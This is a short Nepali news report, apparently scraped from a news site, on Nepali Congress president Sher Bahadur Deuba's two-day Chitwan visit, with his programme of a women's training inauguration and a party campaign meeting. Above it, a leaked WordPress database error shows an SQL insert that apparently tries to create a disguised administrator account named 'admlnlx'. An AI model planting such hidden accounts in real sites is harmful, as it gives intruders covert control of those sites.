WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BASNakBwFLDBIVWHO1L/BOM5lrABC7.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 18:02:32', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २९–
नेपाली काँग्रेसका सभापति एवंम पूर्व प्रधानमन्त्री शेरबहादुर देउवा आज चितवन आउँदै हुनुहुन्छ ।
दुई दिने कार्यक्रमको शिलशिलामा आज सभापति देउवा चितवन आउन लाग्नु भएको हो । पहिलो दिन आज सभापति देउवा नेपाल महिला संघ केन्द्रिय समितिको ३ नम्बर प्रदेश स्तरिय प्रशिक्षण कार्यक्रमको उद्घाटन गर्नुहुनेछ ।
होटल स्टार बैङकेट हाकिमचोक भरतपुरमा विहान ११ बजे कार्यक्रमको उद्घाटन गरिने काँग्रेस चितवनले जनाएको छ । यस्तै भोली (विहीबार) नेपाली काँग्रेस चितवनको संगठन सुदृढीकरण एवं जागरण अभियानको विहान ७ बजे जिल्ला विकास समितिको सभाहलमा हुने काँग्रेस चितवनले जनाएको छ ।